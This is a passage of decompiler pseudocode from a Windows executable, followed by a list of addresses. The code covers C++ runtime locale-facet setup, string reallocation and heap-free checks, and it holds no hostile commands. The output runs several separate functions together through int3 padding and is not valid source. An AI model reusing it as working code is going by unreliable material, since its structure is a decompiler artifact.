                                                                                      								if(__eflags == 0) {
                                                                                      									_t449 = E0041362C(_t363, _t431, _t449, __eflags, 8);
                                                                                      									_t501 = _t499 + 4;
                                                                                      									_v36 = _t449;
                                                                                      									_t40 = _v24 + 4; // 0xd88b04c4
                                                                                      									_t226 =  *_t40;
                                                                                      									__eflags = _t226;
                                                                                      									if(_t226 == 0) {
                                                                                      										_t433 = 0x43e90c;
                                                                                      									} else {
                                                                                      										_t433 =  *(_t226 + 0x18);
                                                                                      										__eflags = _t433;
                                                                                      										if(_t433 == 0) {
                                                                                      											_t42 = _t226 + 0x1c; // 0xd88b04e0
                                                                                      											_t433 = _t42;
                                                                                      										}
                                                                                      									}
                                                                                      									E0041247D( &_v88, 0);
                                                                                      									_v84 = 0;
                                                                                      									_v80 = 0;
                                                                                      									_v76 = 0;
                                                                                      									_v72 = 0;
                                                                                      									_v68 = 0;
                                                                                      									_v64 = 0;
                                                                                      									_v60 = 0;
                                                                                      									_v56 = 0;
                                                                                      									_v52 = 0;
                                                                                      									_v48 = 0;
                                                                                      									_v44 = 0;
                                                                                      									_v40 = 0;
                                                                                      									_v8 = 8;
                                                                                      									__eflags = _t433;
                                                                                      									if(_t433 == 0) {
                                                                                      										E00412430("bad locale name");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										_push(_t482);
                                                                                      										_t484 = _t501;
                                                                                      										_push(0xffffffff);
                                                                                      										_push(0x431c55);
                                                                                      										_push( *[fs:0x0]);
                                                                                      										_t502 = _t501 - 0x14;
                                                                                      										_t231 =  *0x443048; // 0x9900ec21
                                                                                      										_t232 = _t231 ^ _t484;
                                                                                      										_v124 = _t232;
                                                                                      										_push(_t363);
                                                                                      										_push(_t449);
                                                                                      										_push(_t433);
                                                                                      										_push(_t232);
                                                                                      										 *[fs:0x0] =  &_v120;
                                                                                      										_t451 = _v100;
                                                                                      										_v132 = _t451;
                                                                                      										E0041247D( &_v136, 0);
                                                                                      										_v112 = 0;
                                                                                      										_t434 =  *0x444fd0; // 0x0
                                                                                      										_t365 =  *0x444f40; // 0x0
                                                                                      										_v140 = _t365;
                                                                                      										__eflags = _t434;
                                                                                      										if(_t434 == 0) {
                                                                                      											E0041247D( &_v28, _t434);
                                                                                      											__eflags =  *0x444fd0 - _t434; // 0x0
                                                                                      											if(__eflags == 0) {
                                                                                      												_t336 =  *0x444310; // 0x2
                                                                                      												_t337 = _t336 + 1;
                                                                                      												__eflags = _t337;
                                                                                      												 *0x444310 = _t337;
                                                                                      												 *0x444fd0 = _t337;
                                                                                      											}
                                                                                      											E004124D5( &_v28);
                                                                                      											_t434 =  *0x444fd0; // 0x0
                                                                                      										}
                                                                                      										_t418 =  *(_t451 + 4);
                                                                                      										_t384 = _t434 * 4;
                                                                                      										_v28 = _t384;
                                                                                      										__eflags = _t434 -  *((intOrPtr*)(_t418 + 0xc));
                                                                                      										if(_t434 >=  *((intOrPtr*)(_t418 + 0xc))) {
                                                                                      											_t452 = 0;
                                                                                      											__eflags = 0;
                                                                                      											_v28 = _t384;
                                                                                      											goto L50;
                                                                                      										} else {
                                                                                      											_t452 =  *(_t384 +  *((intOrPtr*)(_t418 + 8)));
                                                                                      											__eflags = _t452;
                                                                                      											if(_t452 != 0) {
                                                                                      												L58:
                                                                                      												E004124D5( &_v36);
                                                                                      												 *[fs:0x0] = _v20;
                                                                                      												_pop(_t435);
                                                                                      												_pop(_t453);
                                                                                      												_pop(_t366);
                                                                                      												__eflags = _v24 ^ _t484;
                                                                                      												return E0041361E(_t452, _t366, _v24 ^ _t484, _t418, _t435, _t453);
                                                                                      											} else {
                                                                                      												L50:
                                                                                      												__eflags =  *((char*)(_t418 + 0x14));
                                                                                      												if( *((char*)(_t418 + 0x14)) == 0) {
                                                                                      													L53:
                                                                                      													__eflags = _t452;
                                                                                      													if(_t452 != 0) {
                                                                                      														goto L58;
                                                                                      													} else {
                                                                                      														goto L54;
                                                                                      													}
                                                                                      												} else {
                                                                                      													_t331 = E0041265A();
                                                                                      													__eflags = _t434 -  *((intOrPtr*)(_t331 + 0xc));
                                                                                      													if(_t434 >=  *((intOrPtr*)(_t331 + 0xc))) {
                                                                                      														L54:
                                                                                      														__eflags = _t365;
                                                                                      														if(_t365 == 0) {
                                                                                      															_t239 = E00408E80(_t365, _t434, _t452,  &_v40, _v32);
                                                                                      															_t504 = _t502 + 8;
                                                                                      															__eflags = _t239 - 0xffffffff;
                                                                                      															if(__eflags == 0) {
                                                                                      																_t240 = E00403390();
                                                                                      																asm("int3");
                                                                                      																asm("int3");
                                                                                      																asm("int3");
                                                                                      																asm("int3");
                                                                                      																asm("int3");
                                                                                      																_push(_t484);
                                                                                      																_t486 = _t504;
                                                                                      																_push(_t452);
                                                                                      																_push(_t434);
                                                                                      																_t431 = _t418;
                                                                                      																_t454 = _t384;
                                                                                      																__eflags = _t454 - _t431;
                                                                                      																if(_t454 == _t431) {
                                                                                      																	L68:
                                                                                      																	return _t240;
                                                                                      																} else {
                                                                                      																	do {
                                                                                      																		_t390 =  *((intOrPtr*)(_t454 + 0x14));
                                                                                      																		__eflags = _t390 - 0x10;
                                                                                      																		if(_t390 < 0x10) {
                                                                                      																			goto L67;
                                                                                      																		} else {
                                                                                      																			_t241 =  *_t454;
                                                                                      																			_t391 = _t390 + 1;
                                                                                      																			__eflags = _t391 - 0x1000;
                                                                                      																			if(_t391 < 0x1000) {
                                                                                      																				L66:
                                                                                      																				_push(_t391);
                                                                                      																				_t240 = E004138AD(_t241);
                                                                                      																				_t504 = _t504 + 8;
                                                                                      																				goto L67;
                                                                                      																			} else {
                                                                                      																				_t419 =  *((intOrPtr*)(_t241 - 4));
                                                                                      																				_t391 =  &(_t391[8]);
                                                                                      																				__eflags = _t241 - _t419 + 0xfffffffc - 0x1f;
                                                                                      																				if(_t241 - _t419 + 0xfffffffc > 0x1f) {
                                                                                      																					E0041805F(_t365, _t391, _t419);
                                                                                      																					asm("int3");
                                                                                      																					asm("int3");
                                                                                      																					asm("int3");
                                                                                      																					asm("int3");
                                                                                      																					asm("int3");
                                                                                      																					asm("int3");
                                                                                      																					asm("int3");
                                                                                      																					asm("int3");
                                                                                      																					asm("int3");
                                                                                      																					asm("int3");
                                                                                      																					asm("int3");
                                                                                      																					asm("int3");
                                                                                      																					asm("int3");
                                                                                      																					asm("int3");
                                                                                      																					asm("int3");
                                                                                      																					asm("int3");
                                                                                      																					_push(_t486);
                                                                                      																					_t488 = _t504;
                                                                                      																					_t505 = _t504 - 0xc;
                                                                                      																					_push(_t365);
                                                                                      																					_t367 = _t391;
                                                                                      																					_t392 = 0x7fffffff;
                                                                                      																					_push(_t454);
                                                                                      																					_t456 = _v160;
                                                                                      																					_t420 = _t367[4];
                                                                                      																					_v172 = _t420;
                                                                                      																					_push(_t431);
                                                                                      																					__eflags = 0x7fffffff - _t420 - _t456;
                                                                                      																					if(0x7fffffff - _t420 < _t456) {
                                                                                      																						E00401BD0(_t367, 0x7fffffff, _t420);
                                                                                      																						goto L91;
                                                                                      																					} else {
                                                                                      																						_t431 = _t367[5];
                                                                                      																						_t313 = _t420 + _t456;
                                                                                      																						_v28 = _t313;
                                                                                      																						_t476 = _t313 | 0x0000000f;
                                                                                      																						_v24 = _t431;
                                                                                      																						__eflags = _t476 - 0x7fffffff;
                                                                                      																						if(_t476 <= 0x7fffffff) {
                                                                                      																							_t315 = _t431 >> 1;
                                                                                      																							_t392 = 0x7fffffff - _t315;
                                                                                      																							__eflags = _t431 - _t392;
                                                                                      																							if(_t431 <= _t392) {
                                                                                      																								_t316 = _t315 + _t431;
                                                                                      																								__eflags = _t476 - _t316;
                                                                                      																								_t456 =  <  ? _t316 : _t476;
                                                                                      																								_t121 = _t456 + 1; // 0x80000000
                                                                                      																								_t392 = _t121;
                                                                                      																								__eflags = _t392 - 0x1000;
                                                                                      																								if(_t392 < 0x1000) {
                                                                                      																									__eflags = _t392;
                                                                                      																									if(__eflags == 0) {
                                                                                      																										_t431 = 0;
                                                                                      																										__eflags = 0;
                                                                                      																									} else {
                                                                                      																										_t325 = E0041362C(_t367, _t431, _t456, __eflags, _t392);
                                                                                      																										_t420 = _v20;
                                                                                      																										_t505 = _t505 + 4;
                                                                                      																										_t431 = _t325;
                                                                                      																									}
                                                                                      																									goto L84;
                                                                                      																								} else {
                                                                                      																									_t122 = _t392 + 0x23; // 0x80000023
                                                                                      																									_t326 = _t122;
                                                                                      																									__eflags = _t122 - _t392;
                                                                                      																									if(__eflags <= 0) {
                                                                                      																										L91:
                                                                                      																										E00401B30();
                                                                                      																										goto L92;
                                                                                      																									} else {
                                                                                      																										goto L74;
                                                                                      																									}
                                                                                      																								}
                                                                                      																							} else {
                                                                                      																								_t456 = 0x7fffffff;
                                                                                      																								goto L73;
                                                                                      																							}
                                                                                      																						} else {
                                                                                      																							_t456 = 0x7fffffff;
                                                                                      																							L73:
                                                                                      																							_t326 = 0xffffffff80000023;
                                                                                      																							__eflags = 0x80000000;
                                                                                      																							L74:
                                                                                      																							_t327 = E0041362C(_t367, _t431, _t456, __eflags, _t326);
                                                                                      																							_t505 = _t505 + 4;
                                                                                      																							__eflags = _t327;
                                                                                      																							if(_t327 == 0) {
                                                                                      																								L92:
                                                                                      																								E0041805F(_t367, _t392, _t420);
                                                                                      																								asm("int3");
                                                                                      																								asm("int3");
                                                                                      																								asm("int3");
                                                                                      																								asm("int3");
                                                                                      																								_push(_t488);
                                                                                      																								_t489 = _t505;
                                                                                      																								_t506 = _t505 - 0x14;
                                                                                      																								_push(_t367);
                                                                                      																								_t368 = _t392;
                                                                                      																								_t393 = 0x7fffffff;
                                                                                      																								_push(_t456);
                                                                                      																								_t457 = _v184;
                                                                                      																								_t421 = _t368[4];
                                                                                      																								_v196 = _t421;
                                                                                      																								_push(_t431);
                                                                                      																								__eflags = 0x7fffffff - _t421 - _t457;
                                                                                      																								if(0x7fffffff - _t421 < _t457) {
                                                                                      																									E00401BD0(_t368, 0x7fffffff, _t421);
                                                                                      																									goto L114;
                                                                                      																								} else {
                                                                                      																									_t431 = _t368[5];
                                                                                      																									_t290 = _t421 + _t457;
                                                                                      																									_v28 = _t290;
                                                                                      																									_t470 = _t290 | 0x0000000f;
                                                                                      																									_v32 = _t431;
                                                                                      																									__eflags = _t470 - 0x7fffffff;
                                                                                      																									if(_t470 <= 0x7fffffff) {
                                                                                      																										_t292 = _t431 >> 1;
                                                                                      																										_t393 = 0x7fffffff - _t292;
                                                                                      																										__eflags = _t431 - _t393;
                                                                                      																										if(_t431 <= _t393) {
                                                                                      																											_t293 = _t292 + _t431;
                                                                                      																											__eflags = _t470 - _t293;
                                                                                      																											_t457 =  <  ? _t293 : _t470;
                                                                                      																											_t151 = _t457 + 1; // 0x80000000
                                                                                      																											_t393 = _t151;
                                                                                      																											__eflags = _t393 - 0x1000;
                                                                                      																											if(_t393 < 0x1000) {
                                                                                      																												__eflags = _t393;
                                                                                      																												if(__eflags == 0) {
                                                                                      																													_t431 = 0;
                                                                                      																													__eflags = 0;
                                                                                      																												} else {
                                                                                      																													_t309 = E0041362C(_t368, _t431, _t457, __eflags, _t393);
                                                                                      																													_t421 = _v24;
                                                                                      																													_t506 = _t506 + 4;
                                                                                      																													_t431 = _t309;
                                                                                      																												}
                                                                                      																												goto L107;
                                                                                      																											} else {
                                                                                      																												_t152 = _t393 + 0x23; // 0x80000023
                                                                                      																												_t310 = _t152;
                                                                                      																												__eflags = _t152 - _t393;
                                                                                      																												if(__eflags <= 0) {
                                                                                      																													L114:
                                                                                      																													E00401B30();
                                                                                      																													goto L115;
                                                                                      																												} else {
                                                                                      																													goto L97;
                                                                                      																												}
                                                                                      																											}
                                                                                      																										} else {
                                                                                      																											_t457 = 0x7fffffff;
                                                                                      																											goto L96;
                                                                                      																										}
                                                                                      																									} else {
                                                                                      																										_t457 = 0x7fffffff;
                                                                                      																										L96:
                                                                                      																										_t310 = 0xffffffff80000023;
                                                                                      																										__eflags = 0x80000000;
                                                                                      																										L97:
                                                                                      																										_t311 = E0041362C(_t368, _t431, _t457, __eflags, _t310);
                                                                                      																										_t506 = _t506 + 4;
                                                                                      																										__eflags = _t311;
                                                                                      																										if(_t311 == 0) {
                                                                                      																											L115:
                                                                                      																											E0041805F(_t368, _t393, _t421);
                                                                                      																											asm("int3");
                                                                                      																											asm("int3");
                                                                                      																											asm("int3");
                                                                                      																											asm("int3");
                                                                                      																											_push(_t489);
                                                                                      																											_t482 = _t506;
                                                                                      																											_t499 = _t506 - 0x10;
                                                                                      																											_push(_t368);
                                                                                      																											_t362 = _t393;
                                                                                      																											_t394 = 0x7fffffff;
                                                                                      																											_push(_t457);
                                                                                      																											_t448 = _v216;
                                                                                      																											_t422 = _t362[4];
                                                                                      																											_v228 = _t422;
                                                                                      																											_push(_t431);
                                                                                      																											__eflags = 0x7fffffff - _t422 - _t448;
                                                                                      																											if(0x7fffffff - _t422 < _t448) {
                                                                                      																												E00401BD0(_t362, 0x7fffffff, _t422);
                                                                                      																												goto L137;
                                                                                      																											} else {
                                                                                      																												_t431 = _t362[5];
                                                                                      																												_t268 = _t422 + _t448;
                                                                                      																												_v32 = _t268;
                                                                                      																												_t464 = _t268 | 0x0000000f;
                                                                                      																												_v36 = _t431;
                                                                                      																												__eflags = _t464 - 0x7fffffff;
                                                                                      																												if(_t464 <= 0x7fffffff) {
                                                                                      																													_t270 = _t431 >> 1;
                                                                                      																													_t394 = 0x7fffffff - _t270;
                                                                                      																													__eflags = _t431 - _t394;
                                                                                      																													if(_t431 <= _t394) {
                                                                                      																														_t271 = _t270 + _t431;
                                                                                      																														__eflags = _t464 - _t271;
                                                                                      																														_t448 =  <  ? _t271 : _t464;
                                                                                      																														_t191 = _t448 + 1; // 0x80000000
                                                                                      																														_t394 = _t191;
                                                                                      																														__eflags = _t394 - 0x1000;
                                                                                      																														if(_t394 < 0x1000) {
                                                                                      																															__eflags = _t394;
                                                                                      																															if(__eflags == 0) {
                                                                                      																																_t431 = 0;
                                                                                      																																__eflags = 0;
                                                                                      																															} else {
                                                                                      																																_t286 = E0041362C(_t362, _t431, _t448, __eflags, _t394);
                                                                                      																																_t422 = _v28;
                                                                                      																																_t499 = _t499 + 4;
                                                                                      																																_t431 = _t286;
                                                                                      																															}
                                                                                      																															goto L130;
                                                                                      																														} else {
                                                                                      																															_t192 = _t394 + 0x23; // 0x80000023
                                                                                      																															_t287 = _t192;
                                                                                      																															__eflags = _t192 - _t394;
                                                                                      																															if(__eflags <= 0) {
                                                                                      																																L137:
                                                                                      																																E00401B30();
                                                                                      																																goto L138;
                                                                                      																															} else {
                                                                                      																																goto L120;
                                                                                      																															}
                                                                                      																														}
                                                                                      																													} else {
                                                                                      																														_t448 = 0x7fffffff;
                                                                                      																														goto L119;
                                                                                      																													}
                                                                                      																												} else {
                                                                                      																													_t448 = 0x7fffffff;
                                                                                      																													L119:
                                                                                      																													_t287 = 0xffffffff80000023;
                                                                                      																													__eflags = 0x80000000;
                                                                                      																													L120:
                                                                                      																													_t288 = E0041362C(_t362, _t431, _t448, __eflags, _t287);
                                                                                      																													_t499 = _t499 + 4;
                                                                                      																													__eflags = _t288;
                                                                                      																													if(_t288 == 0) {
                                                                                      																														L138:
                                                                                      																														_t219 = E0041805F(_t362, _t394, _t422);
                                                                                      																														asm("int3");
                                                                                      																														asm("int3");
                                                                                      																														asm("int3");
                                                                                      																														asm("int3");
                                                                                      																														asm("int3");
                                                                                      																														_t375 =  *_t394;
                                                                                      																														__eflags = _t375;
                                                                                      																														if(_t375 != 0) {
                                                                                      																															_push(_t431);
                                                                                      																															_t437 = _t375;
                                                                                      																															_t395 =  *_t437;
                                                                                      																															if(_t395 == 0) {
                                                                                      																																L6:
                                                                                      																																return _t219;
                                                                                      																															} else {
                                                                                      																																_push(_t448);
                                                                                      																																_push(_t395);
                                                                                      																																L60();
                                                                                      																																_t458 =  *_t437;
                                                                                      																																_t399 = (0x2aaaaaab * ( *(_t437 + 8) - _t458) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *(_t437 + 8) - _t458) >> 0x20 >> 2) + ((0x2aaaaaab * ( *(_t437 + 8) - _t458) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *(_t437 + 8) - _t458) >> 0x20 >> 2)) * 2 << 3;
                                                                                      																																if(_t399 < 0x1000) {
                                                                                      																																	L5:
                                                                                      																																	_push(_t399);
                                                                                      																																	_t219 = E004138AD(_t458);
                                                                                      																																	 *_t437 = 0;
                                                                                      																																	 *(_t437 + 4) = 0;
                                                                                      																																	 *(_t437 + 8) = 0;
                                                                                      																																	goto L6;
                                                                                      																																} else {
                                                                                      																																	_t426 =  *((intOrPtr*)(_t458 - 4));
                                                                                      																																	_t399 = _t399 + 0x23;
                                                                                      																																	_t460 = _t458 - _t426;
                                                                                      																																	if(_t460 - 4 > 0x1f) {
                                                                                      																																		E0041805F(_t362, _t399, _t426);
                                                                                      																																		asm("int3");
                                                                                      																																		asm("int3");
                                                                                      																																		asm("int3");
                                                                                      																																		asm("int3");
                                                                                      																																		asm("int3");
                                                                                      																																		asm("int3");
                                                                                      																																		asm("int3");
                                                                                      																																		asm("int3");
                                                                                      																																		asm("int3");
                                                                                      																																		asm("int3");
                                                                                      																																		asm("int3");
                                                                                      																																		asm("int3");
                                                                                      																																		_push(_t482);
                                                                                      																																		__eflags = _v252 & 0x00000001;
                                                                                      																																		_push(_t460);
                                                                                      																																		_t461 = _t399;
                                                                                      																																		 *_t461 = 0x4337e4;
                                                                                      																																		if((_v252 & 0x00000001) != 0) {
                                                                                      																																			_push(8);
                                                                                      																																			E004138AD(_t461);
                                                                                      																																		}
                                                                                      																																		return _t461;
                                                                                      																																	} else {
                                                                                      																																		_t458 = _t426;
                                                                                      																																		goto L5;
                                                                                      																																	}
                                                                                      																																}
                                                                                      																															}
                                                                                      																														} else {
                                                                                      																															return _t219;
                                                                                      																														}
                                                                                      																													} else {
                                                                                      																														_t422 = _v28;
                                                                                      																														_t189 = _t288 + 0x23; // 0x23
                                                                                      																														_t431 = _t189 & 0xffffffe0;
                                                                                      																														 *(_t431 - 4) = _t288;
                                                                                      																														L130:
                                                                                      																														_t362[4] = _v32;
                                                                                      																														_v28 = _v4;
                                                                                      																														_t362[5] = _t448;
                                                                                      																														_t465 = _t431 + _t422;
                                                                                      																														_v40 = _t465;
                                                                                      																														__eflags = _v36 - 0x10;
                                                                                      																														_v32 = _v8 + _t465;
                                                                                      																														_push(_t422);
                                                                                      																														if(_v36 < 0x10) {
                                                                                      																															_push(_t362);
                                                                                      																															_push(_t431);
                                                                                      																															E00414BF0();
                                                                                      																															E00415180(_t431, _t465, _v28, _v8);
                                                                                      																															 *_v32 = 0;
                                                                                      																															 *_t362 = _t431;
                                                                                      																															return _t362;
                                                                                      																														} else {
                                                                                      																															_t467 =  *_t362;
                                                                                      																															_push(_t467);
                                                                                      																															_push(_t431);
                                                                                      																															E00414BF0();
                                                                                      																															E00415180(_t431, _v40, _v28, _v8);
                                                                                      																															_t499 = _t499 + 0x18;
                                                                                      																															_t401 = _v36 + 1;
                                                                                      																															 *_v32 = 0;
                                                                                      																															__eflags = _t401 - 0x1000;
                                                                                      																															if(_t401 < 0x1000) {
                                                                                      																																L134:
                                                                                      																																_push(_t401);
                                                                                      																																E004138AD(_t467);
                                                                                      																																 *_t362 = _t431;
                                                                                      																																return _t362;
                                                                                      																															} else {
                                                                                      																																_t422 =  *(_t467 - 4);
                                                                                      																																_t394 = _t401 + 0x23;
                                                                                      																																_t448 = _t467 - _t422;
                                                                                      																																_t210 = _t448 - 4; // 0x7ffffffb
                                                                                      																																__eflags = _t210 - 0x1f;
                                                                                      																																if(_t210 > 0x1f) {
                                                                                      																																	goto L138;
                                                                                      																																} else {
                                                                                      																																	_t467 = _t422;
                                                                                      																																	goto L134;
                                                                                      																																}
                                                                                      																															}
                                                                                      																														}
                                                                                      																													}
                                                                                      																												}
                                                                                      																											}
                                                                                      																										} else {
                                                                                      																											_t421 = _v24;
                                                                                      																											_t149 = _t311 + 0x23; // 0x23
                                                                                      																											_t431 = _t149 & 0xffffffe0;
                                                                                      																											 *(_t431 - 4) = _t311;
                                                                                      																											L107:
                                                                                      																											_t368[4] = _v28;
                                                                                      																											_v24 = _a4;
                                                                                      																											_t296 = _v4;
                                                                                      																											_t368[5] = _t457;
                                                                                      																											_push(_t296);
                                                                                      																											_v36 = _t421 - _t296 + 1;
                                                                                      																											_t471 = _t431 + _t296;
                                                                                      																											_v40 = _t471;
                                                                                      																											__eflags = _v32 - 0x10;
                                                                                      																											_v28 = _v0 + _t471;
                                                                                      																											if(_v32 < 0x10) {
                                                                                      																												_push(_t368);
                                                                                      																												_push(_t431);
                                                                                      																												E00414BF0();
                                                                                      																												E00415180(_t431, _t471, _v24, _v0);
                                                                                      																												__eflags = _v4 + _t368;
                                                                                      																												E00414BF0(_v28, _v4 + _t368, _v36);
                                                                                      																												 *_t368 = _t431;
                                                                                      																												return _t368;
                                                                                      																											} else {
                                                                                      																												_t473 =  *_t368;
                                                                                      																												_push(_t473);
                                                                                      																												_push(_t431);
                                                                                      																												E00414BF0();
                                                                                      																												E00415180(_t431, _v40, _v24, _v0);
                                                                                      																												E00414BF0(_v28, _v4 + _t473, _v36);
                                                                                      																												_t506 = _t506 + 0x24;
                                                                                      																												_t408 = _v32 + 1;
                                                                                      																												__eflags = _t408 - 0x1000;
                                                                                      																												if(_t408 < 0x1000) {
                                                                                      																													L111:
                                                                                      																													_push(_t408);
                                                                                      																													E004138AD(_t473);
                                                                                      																													 *_t368 = _t431;
                                                                                      																													return _t368;
                                                                                      																												} else {
                                                                                      																													_t421 =  *(_t473 - 4);
                                                                                      																													_t393 = _t408 + 0x23;
                                                                                      																													_t457 = _t473 - _t421;
                                                                                      																													_t175 = _t457 - 4; // 0x7ffffffb
                                                                                      																													__eflags = _t175 - 0x1f;
                                                                                      																													if(_t175 > 0x1f) {
                                                                                      																														goto L115;
                                                                                      																													} else {
                                                                                      																														_t473 = _t421;
                                                                                      																														goto L111;
                                                                                      																													}
                                                                                      																												}
                                                                                      																											}
                                                                                      																										}
                                                                                      																									}
                                                                                      																								}
                                                                                      																							} else {
                                                                                      																								_t420 = _v20;
                                                                                      																								_t119 = _t327 + 0x23; // 0x23
                                                                                      																								_t431 = _t119 & 0xffffffe0;
                                                                                      																								 *(_t431 - 4) = _t327;
                                                                                      																								L84:
                                                                                      																								__eflags = _v24 - 0x10;
                                                                                      																								_t367[4] = _v28;
                                                                                      																								_t367[5] = _t456;
                                                                                      																								_push(_t420);
                                                                                      																								if(_v24 < 0x10) {
                                                                                      																									_push(_t367);
                                                                                      																									_push(_t431);
                                                                                      																									E00414BF0();
                                                                                      																									_t428 = _v20;
                                                                                      																									 *((char*)(_t431 + _t428)) = _v0;
                                                                                      																									 *((char*)(_t431 + _t428 + 1)) = 0;
                                                                                      																									 *_t367 = _t431;
                                                                                      																									return _t367;
                                                                                      																								} else {
                                                                                      																									_t478 =  *_t367;
                                                                                      																									_push(_t478);
                                                                                      																									_push(_t431);
                                                                                      																									E00414BF0();
                                                                                      																									_t429 = _v20;
                                                                                      																									_t505 = _t505 + 0xc;
                                                                                      																									_t411 = _v24 + 1;
                                                                                      																									 *((char*)(_t431 + _t429)) = _v0;
                                                                                      																									 *((char*)(_t431 + _t429 + 1)) = 0;
                                                                                      																									__eflags = _t411 - 0x1000;
                                                                                      																									if(_t411 < 0x1000) {
                                                                                      																										L88:
                                                                                      																										_push(_t411);
                                                                                      																										E004138AD(_t478);
                                                                                      																										 *_t367 = _t431;
                                                                                      																										return _t367;
                                                                                      																									} else {
                                                                                      																										_t420 =  *(_t478 - 4);
                                                                                      																										_t392 = _t411 + 0x23;
                                                                                      																										_t456 = _t478 - _t420;
                                                                                      																										_t135 = _t456 - 4; // 0x7ffffffb
                                                                                      																										__eflags = _t135 - 0x1f;
                                                                                      																										if(_t135 > 0x1f) {
                                                                                      																											goto L92;
                                                                                      																										} else {
                                                                                      																											_t478 = _t420;
                                                                                      																											goto L88;
                                                                                      																										}
                                                                                      																									}
                                                                                      																								}
                                                                                      																							}
                                                                                      																						}
                                                                                      																					}
                                                                                      																				} else {
                                                                                      																					_t241 = _t419;
                                                                                      																					goto L66;
                                                                                      																				}
                                                                                      																			}
                                                                                      																		}
                                                                                      																		goto L141;
                                                                                      																		L67:
                                                                                      																		 *(_t454 + 0x10) = 0;
                                                                                      																		 *((intOrPtr*)(_t454 + 0x14)) = 0xf;
                                                                                      																		 *_t454 = 0;
                                                                                      																		_t454 = _t454 + 0x18;
                                                                                      																		__eflags = _t454 - _t431;
                                                                                      																	} while (_t454 != _t431);
                                                                                      																	goto L68;
                                                                                      																}
                                                                                      															} else {
                                                                                      																_t452 = _v40;
                                                                                      																_v32 = _t452;
                                                                                      																_v12 = 1;
                                                                                      																E0041262E(__eflags, _t452);
                                                                                      																_t418 =  *_t452;
                                                                                      																 *((intOrPtr*)( *_t452 + 4))();
                                                                                      																 *0x444f40 = _t452;
                                                                                      																goto L58;
                                                                                      															}
                                                                                      														} else {
                                                                                      															_t452 = _t365;
                                                                                      															goto L58;
                                                                                      														}
                                                                                      													} else {
                                                                                      														_t452 =  *(_v28 +  *((intOrPtr*)(_t331 + 8)));
                                                                                      														goto L53;
                                                                                      													}
                                                                                      												}
                                                                                      											}
                                                                                      										}
                                                                                      									} else {
                                                                                      										E00412760( &_v88,  &_v88, _t433);
                                                                                      										 *(_t449 + 4) = 0;
                                                                                      										 *_t449 = 0x434418;
                                                                                      										_v8 = 9;
                                                                                      										E004127AB( &_v88,  &_v88);
                                                                                      										_t342 = _v44;
                                                                                      										_t523 = _t501 + 0xc;
                                                                                      										__eflags = _t342;
                                                                                      										if(_t342 != 0) {
                                                                                      											E0041AC1E(_t342);
                                                                                      											_t523 = _t523 + 4;
                                                                                      										}
                                                                                      										_t343 = _v52;
                                                                                      										_v44 = 0;
                                                                                      										__eflags = _t343;
                                                                                      										if(_t343 != 0) {
                                                                                      											E0041AC1E(_t343);
                                                                                      											_t523 = _t523 + 4;
                                                                                      										}
                                                                                      										_t344 = _v60;
                                                                                      										_v52 = 0;
                                                                                      										__eflags = _t344;
                                                                                      										if(_t344 != 0) {
                                                                                      											E0041AC1E(_t344);
                                                                                      											_t523 = _t523 + 4;
                                                                                      										}
                                                                                      										_t345 = _v68;
                                                                                      										_v60 = 0;
                                                                                      										__eflags = _t345;
                                                                                      										if(_t345 != 0) {
                                                                                      											E0041AC1E(_t345);
                                                                                      											_t523 = _t523 + 4;
                                                                                      										}
                                                                                      										_t346 = _v76;
                                                                                      										_v68 = 0;
                                                                                      										__eflags = _t346;
                                                                                      										if(_t346 != 0) {
                                                                                      											E0041AC1E(_t346);
                                                                                      											_t523 = _t523 + 4;
                                                                                      										}
                                                                                      										_t347 = _v84;
                                                                                      										_v76 = 0;
                                                                                      										__eflags = _t347;
                                                                                      										if(_t347 != 0) {
                                                                                      											E0041AC1E(_t347);
                                                                                      											_t523 = _t523 + 4;
                                                                                      										}
                                                                                      										_v84 = 0;
                                                                                      										E004124D5( &_v88);
                                                                                      										_v24 = _t449;
                                                                                      										_v8 = 0xa;
                                                                                      										E0041262E(__eflags, _t449);
                                                                                      										 *((intOrPtr*)( *_t449 + 4))();
                                                                                      										 *0x444f44 = _t449;
                                                                                      										goto L15;
                                                                                      									}
                                                                                      								} else {
                                                                                      									_t449 = _t223;
                                                                                      									goto L15;
                                                                                      								}
                                                                                      							} else {
                                                                                      								_t449 =  *(_t363 +  *((intOrPtr*)(_t358 + 8)));
                                                                                      								goto L20;
                                                                                      							}
                                                                                      						}
                                                                                      					} else {
                                                                                      						L15:
                                                                                      						E004124D5( &_v28);
                                                                                      						 *[fs:0x0] = _v16;
                                                                                      						_pop(_t432);
                                                                                      						_pop(_t450);
                                                                                      						_pop(_t364);
                                                                                      						__eflags = _v20 ^ _t482;
                                                                                      						return E0041361E(_t449, _t364, _v20 ^ _t482, _t417, _t432, _t450);
                                                                                      					}
                                                                                      				}
                                                                                      				L141:
                                                                                      			}










































































































































                                                                                      0x00408650
                                                                                      0x00408650
                                                                                      0x00408651
                                                                                      0x00408653
                                                                                      0x00408655
                                                                                      0x00408660
                                                                                      0x00408661
                                                                                      0x00408664
                                                                                      0x00408669
                                                                                      0x0040866b
                                                                                      0x0040866e
                                                                                      0x0040866f
                                                                                      0x00408670
                                                                                      0x00408671
                                                                                      0x00408675
                                                                                      0x0040867b
                                                                                      0x0040867e
                                                                                      0x00408683
                                                                                      0x00408686
                                                                                      0x0040868b
                                                                                      0x00408692
                                                                                      0x00408698
                                                                                      0x0040869d
                                                                                      0x004086a2
                                                                                      0x004086a5
                                                                                      0x004086a8
                                                                                      0x004086ad
                                                                                      0x004086b3
                                                                                      0x004086b5
                                                                                      0x004086ba
                                                                                      0x004086ba
                                                                                      0x004086bb
                                                                                      0x004086c0
                                                                                      0x004086c0
                                                                                      0x004086c5
                                                                                      0x004086c8
                                                                                      0x004086cd
                                                                                      0x004086cd
                                                                                      0x004086d3
                                                                                      0x004086d3
                                                                                      0x004086d6
                                                                                      0x004086dd
                                                                                      0x004086e0
                                                                                      0x00408712
                                                                                      0x00408712
                                                                                      0x00000000
                                                                                      0x004086e2
                                                                                      0x004086e5
                                                                                      0x004086e8
                                                                                      0x004086ea
                                                                                      0x00408714
                                                                                      0x00408714
                                                                                      0x00408718
                                                                                      0x0040872a
                                                                                      0x0040872a
